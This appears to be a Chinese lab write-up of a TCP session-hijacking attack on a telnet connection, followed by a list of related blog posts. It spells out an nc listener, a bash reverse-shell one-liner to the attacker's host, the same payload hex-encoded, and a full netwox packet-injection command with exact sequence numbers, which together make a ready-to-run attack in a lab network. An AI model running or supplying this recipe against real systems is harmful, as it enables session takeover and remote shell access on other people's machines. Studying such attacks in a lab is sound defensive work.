TCP劫持及反弹shell攻击
TCP劫持及反弹shell攻击
0.实验环境
server 192.168.88.137
client 192.168.88.131
kali 192.168.88.133
1.ARP攻击 劫持流量
参照之前的实验不过多赘述
2.观察流量
读到 src_port、seq、ack 如何具体取值请看 4.注.3
注:seq、ack值 在取值之前需要设置
1.右键选中一个tcp流量
2.按照图示 将光标处的选项取消勾选
3.开启监听
nc -lvvp 9999
表示监听本机9999端口
4.构造payload
1.构造shellcode
bash -i>&/dev/tcp/192.168.88.133/9999 0>&1
经典反弹shell命令
使用cyberchef,tohex
62617368202d693e262f6465762f7463702f3139322e3136382e38382e3133332f3939393920303e2631
记得加 0d00
其中 0x0d为回车 0x00 为空字符 目的截断
最后的shellcode为
62617368202d693e262f6465762f7463702f3139322e3136382e38382e3133332f3939393920303e26310d00
2.构造攻击命令
sudo netwox 40 --ip4-ttl 128 --ip4-protocol 6 --ip4-src {client} --ip4-dst {server} --tcp-src {src_port} --tcp-dst 23 --tcp-seqnum {ack} --tcp-acknum {seq} --tcp-ack --tcp-psh --tcp-window 227 --tcp-data {shellcode}
注:
1. ack、seq一定要反着来,别问为什么,问就去补tcp/ip工作原理吧!
2.{name}:获取变量名为name的值 熟悉python的同学很了解吧
3.由于处于ARP欺骗中,不要看错包
这四个包为一组 后两个包为确认收到的包
所以src_port、seq、ack应从前两个包中取 不然又反了。。。(视频前两次失败的原因就在这,懒得补录了。。。)
src_port 即 41450
seq 即 2818841513
ack 即 3893561905
eg:
sudo netwox 40 --ip4-ttl 128 --ip4-protocol 6 --ip4-src 192.168.88.131 --ip4-dst 192.168.88.137 --tcp-src 47740 --tcp-dst 23 --tcp-seqnum 3035401169 --tcp-acknum 1050352061 --tcp-ack --tcp-psh --tcp-window 227 --tcp-data 62617368202d693e262f6465762f7463702f3139322e3136382e38382e3133332f3939393920303e26310d00
执行即可拿到shell
备注
本次实验基于telnet
使实验成为可能主要原因:1.劫持流量 2.telnet为明文传输
所以不能使用ssh进行本次实验 原因:ssh使用密文传输,不是说不能打而是条件苛刻。
关于ubuntu 20.04 LTS 如何开启telnet
劫持流量 2.telnet为明文传输
所以不能使用ssh进行本次实验 原因:ssh使用密文传输,不是说不能打而是条件苛刻。
关于ubuntu 20.04 LTS 如何开启telnet
参考了解决Ubuntu中telnet 127.0.0.1时Unable to connect to remote host: Connection refused的问题
TCP劫持及反弹shell攻击相关推荐
- TCP劫持攻击与防御
TCP劫持攻击 攻击思路 hacker需要获取client与server的tcp回话信息(arp攻击等获取流量). 观察server给client的报文信息. hacker根据观察获得的信息构造一个t ...
- [网络安全自学篇] 五十三.Windows系统安全之Metasploit实现栈溢出攻击及反弹shell原理解析
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了虚拟机基础知识,包括XP操作系统安装.文件共享设置.网络快照及网络设置 ...
- win7 dll怎么在xp运行_微信DLL劫持反弹shell复现
网安引领时代,弥天点亮未来 写在前面: 最近刚好在做PPT的dll劫持测试,现在就随便拿一个程序来练练手.增加一下熟练度.本测试纯属学习测试过程,不可用于非法操作!!! 一.测试环境 工具下载地址: ...
- 中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客
中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员. WebShell WebShell可以理解为网页中的木马程序,通过植 ...
- linux 反弹shell(二)反弹shell的本质
0X00 前言 在上一篇文章 Linux反弹shell(一)文件描述符与重定向,我们已经讨论过了反弹shell中最核心也是相对较难理解的部分,那么接下来我们就可以正式借反弹shell的实例分析回顾前一 ...
- 一句话反弹shell
1.bash反弹 攻击机监听端口 netcat: nc -nvlp 4444 -n: 不反向解析dns,即不通过ip解析域名 no dns -v: 详细信息输出 verbose -l: 监听 ...
- 【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。...
反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹. 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常 ...
- centos7输入shell找不到命令_反弹shell原理与实现
什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与tel ...
- windows 反弹shell_容器内反弹shell的51种姿势
什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与tel ...
最新文章
- python入门到精通需要学多久-Python零基础入门到精通:一个月就够了
- DFT,DTFT,DFS,FFT之间的关系以及序列补零和插值对频域的影响
- c# 在DataTable的第一列(指定列)的前面添加一列
- C# 操作ACCESS数据库
- 依赖倒置原则(DIP)、控制反转(IoC)、依赖注入(DI)(C#)
- android 获取加速度传感器值,Android开发获取传感器数据的方法示例【加速度传感器,磁场传感器,光线传感器,方向传感器】...
- python输出文字和数字加法_用c语言或者python将文件中特定字符串后面的数字相加...
- WARCannon:高速低功耗网络爬虫
- PRML 回归的线性模型
- win10设置任务栏全透明、免安装第三方软件
- 成为会带团队的技术人 业务理解:深入业务是做好架构的前提
- p2p网络中的NAT穿透
- trajan 算法 离线求lca 超详细讲解~~~~ 保证一看就懂~~~
- 牛客网 吉首大学2019年程序设计竞赛(重现赛)A: SARS病毒(矩阵快速幂 + 碰巧降幂)
- 排球分组循环交叉编排_巍山县举办气排球赛,看谁技高一筹!
- 狼性精神——《世界上最伟大的推销员》
- 华为云MVP周峥:气象预报是个技术活,大数据、超算、AI,缺一不可
- 基于thinkphp5的简单的下拉菜单二级联动
- 系统之家U盘 win10返回桌面快捷键是什么
- 免费搭建企业级直播平台,破解H5Storm限制
热门文章
- @Value(${}) 与@Value(#{}) 区别
- ZX297520V3T:Codec NAU88C22驱动调试
- 百度地图添加自定义点标记、文本标注、点标记
- ERDAS IMAGINE 9.2进行遥感影像融合
- centos6.4下安装fetion
- 参加星火可视化大赛,赢取万元大奖,并有机会获得实习及招聘绿色通道的机会~
- 从零开始学前端 - 2. HTML常用标签_1
- Java中如何解析SQL语句、格式化SQL语句、生成SQL语句?
- Linux命令:man
- openstack学习之路(运维部份)